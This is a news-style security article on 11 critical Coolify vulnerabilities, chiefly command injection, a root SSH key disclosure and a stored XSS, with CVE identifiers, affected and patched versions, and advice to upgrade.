A recently published comprehensive security disclosure has brought to light a series of 11 critical vulnerabilities within the Coolify open-source platform, placing tens of thousands of self-hosted servers at immediate risk of complete takeover. This alarming discovery, detailed by cybersecurity researchers, underscores a significant threat to users who rely on the self-hosting solution for managing their applications and services. The majority of these identified flaws have been assigned the highest possible CVSS severity score of 10.0, indicating a level of criticality that demands immediate attention from administrators. The core issue revolves around multiple avenues for command injection, allowing attackers—in some instances, those with only minimal user privileges—to execute arbitrary commands on the host server with the highest level of system access. With an estimated 52,890 Coolify instances exposed online across the globe, primarily in Germany, the United States, and France, the potential for widespread compromise is substantial. This situation highlights the inherent risks of self-hosted infrastructure and the paramount importance of vigilant security practices and timely software updates.
The Anatomy of a Compromise
The central and most pervasive threat across the discovered vulnerabilities is command injection, a classic yet devastating attack vector that grants unauthorized command execution on the underlying server. In the case of Coolify, these flaws are deeply embedded within numerous core platform functionalities, creating multiple pathways for exploitation by an authenticated user. For example, critical injection vulnerabilities were identified in essential database management features. The handling of PostgreSQL initialization scripts (CVE-2025-66211), as well as database backup (CVE-2025-66209) and import (CVE-2025-66210) operations, were all found to be susceptible. An attacker with the necessary permissions to manage databases could craft malicious inputs for these functions, which would then be executed directly by the system with root privileges. This provides a direct line to full server control. Similarly, high-impact injection flaws were discovered in the Dynamic Proxy Configuration (CVE-2025-66212) and File Storage Directory Mount (CVE-2025-66213) services, further expanding the attack surface for users with specific management roles.
Further compounding the platform’s security posture, several of the most severe vulnerabilities arise from the improper sanitization and handling of user-provided configuration data, a fundamental aspect of the platform’s operation. This category of flaws allows attackers to achieve root-level command execution by embedding malicious commands within otherwise standard configuration files and input fields. One significant vulnerability (CVE-2025-64419) permits an attacker to inject malicious shell commands into a docker-compose.yaml file, which are then executed when the service is deployed or updated. Other attack vectors target the git integration, where malicious commands can be injected into git source input fields (CVE-2025-64424, CVE-2025-59157) or Docker Compose directives (CVE-2025-59156). What makes these particular vulnerabilities exceptionally dangerous is that they can be exploited by users with standard or “member-level” privileges. This effectively creates a straightforward and low-barrier method for privilege escalation, allowing a regular user to elevate their access to full root control over the entire host system with minimal effort.
Beyond Direct Command Execution
While command injection represents the most common attack vector, the security disclosure also revealed critical flaws that bypass the need for command execution entirely, offering attackers a more direct path to compromise. A particularly alarming information disclosure vulnerability (CVE-2025-64420) was uncovered, which allows a low-privileged authenticated user to gain access to the private SSH key belonging to the root user on the Coolify instance. This flaw is catastrophic, as it effectively hands an attacker the keys to the kingdom. With the root SSH key in hand, an adversary can establish a direct, fully authenticated remote session on the server, granting them persistent and unfettered root access without having to exploit any other flaw. This circumvents many common security monitoring tools that might otherwise detect suspicious command execution. In a separate but also serious issue, a stored cross-site scripting (XSS) vulnerability (CVE-2025-59158) was identified. An authenticated user could inject a malicious script during the project creation process. This script would remain dormant until an administrator later performs an action, such as deleting the project, at which point it executes within the administrator’s browser, potentially leading to session hijacking or further system compromise.
A Call for Immediate Remediation
The disclosure of these vulnerabilities impacted a range of Coolify v4.0.0 beta builds, specifically up to and including version 4.0.0-beta.450. In response to the findings, developers issued patches in several subsequent releases, including 4.0.0-beta.420.7, 4.0.0-beta.445, and 4.0.0-beta.451, which addressed the majority of the critical issues. Although the patch status for two of the CVEs remained unconfirmed at the time of the report, the release of these updated versions provided a clear path to mitigation for concerned administrators. While there were no public reports of these flaws being actively exploited in the wild, the extreme severity ratings and the straightforward nature of several exploitation paths created a scenario where preventative action was essential. The event served as a crucial reminder for the self-hosting community that the convenience and control offered by platforms like Coolify come with the responsibility of diligent security maintenance. The potential for complete infrastructure compromise made it imperative for all users to verify their instance versions and upgrade to the latest patched releases without delay to secure their servers from potential takeover.